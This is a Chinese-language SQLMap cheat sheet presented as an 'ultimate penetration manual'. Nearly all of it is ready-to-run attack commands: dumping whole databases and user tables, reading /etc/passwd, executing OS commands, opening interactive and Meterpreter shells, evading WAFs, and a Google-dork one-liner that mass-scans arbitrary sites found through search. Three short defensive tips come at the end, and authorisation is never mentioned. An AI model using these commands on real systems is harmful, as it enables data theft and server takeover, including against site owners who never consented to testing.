SQLMap 终极渗透手册（2025全功能版）

|-------------------|---------|-----------------------------------------|
| 命令 | 功能 | 示例 |
| sqlmap -u "url" | 基础检测 | sqlmap -u "http://test.com/news?id=1" |
| --current-user | 当前数据库用户 | sqlmap -u "url" --current-user |
| --current-db | 当前数据库 | sqlmap -u "url" --current-db |
| --dbs | 列出所有数据库 | sqlmap -u "url" --dbs |

📂 数据枚举

层级式渗透

复制代码

# 1. 获取数据库
sqlmap -u "http://test.com/news?id=1" --dbs

# 2. 获取表
sqlmap -u "http://test.com/news?id=1" --tables -D "数据库名"

# 3. 获取字段
sqlmap -u "http://test.com/news?id=1" --columns -T "表名" -D "数据库名"

# 4. 导出数据
sqlmap -u "http://test.com/news?id=1" --dump -C "字段名" -T "表名" -D "数据库名"

批量操作

复制代码

# 导出整个数据库
sqlmap -u "http://test.com/news?id=1" --dump-all --exclude-sysdbs

# 导出指定范围数据
sqlmap -u "http://test.com/news?id=1" --dump -T "users" -D "app_db" --start=1 --stop=100

🛠️ 高级功能

1. 权限提升

复制代码

# 检测是否为DBA
sqlmap -u "url" --is-dba

# 获取系统文件（需要高权限）
sqlmap -u "url" --file-read="/etc/passwd"

2. 系统命令执行

复制代码

# 执行单条命令
sqlmap -u "url" --os-cmd="whoami"

# 获取交互式Shell
sqlmap -u "url" --os-shell

# 获取Meterpreter会话（需Metasploit）
sqlmap -u "url" --os-pwn --msf-path=/opt/metasploit

3. 绕过WAF

复制代码

# 使用TAMPER脚本
sqlmap -u "url" --tamper="space2comment"

# 设置延迟
sqlmap -u "url" --delay=3

# 随机UA
sqlmap -u "url" --random-agent

🎯 实战场景

场景1：Cookie注入

复制代码

sqlmap -u "http://test.com/login" --cookie="PHPSESSID=1234" --level=3

场景2：POST注入

复制代码

sqlmap -u "http://test.com/login" --data="username=admin&password=123"

场景3：谷歌黑客批量检测

复制代码

sqlmap -g "inurl:.php?id=" --batch --smart

📊 结果管理

复制代码

# 保存进度
sqlmap -u "url" --output-dir=/root/sqlmap_results

# 恢复进度
sqlmap --resume -l /root/sqlmap_results/log

⚡ 效率优化

复制代码

# 多线程扫描
sqlmap -u "url" --threads=5

# 仅检测不攻击
sqlmap -u "url" --dbs --batch --smart

⚠️ 防护建议

使用参数化查询
最小化数据库权限
部署WAF防护

💡 提示：

使用-v 3查看详细过程
复杂环境下添加--flush-session清除缓存
首次测试建议从--level=1 --risk=1开始

👉 按需组合命令参数，注意操作风险！ 🚀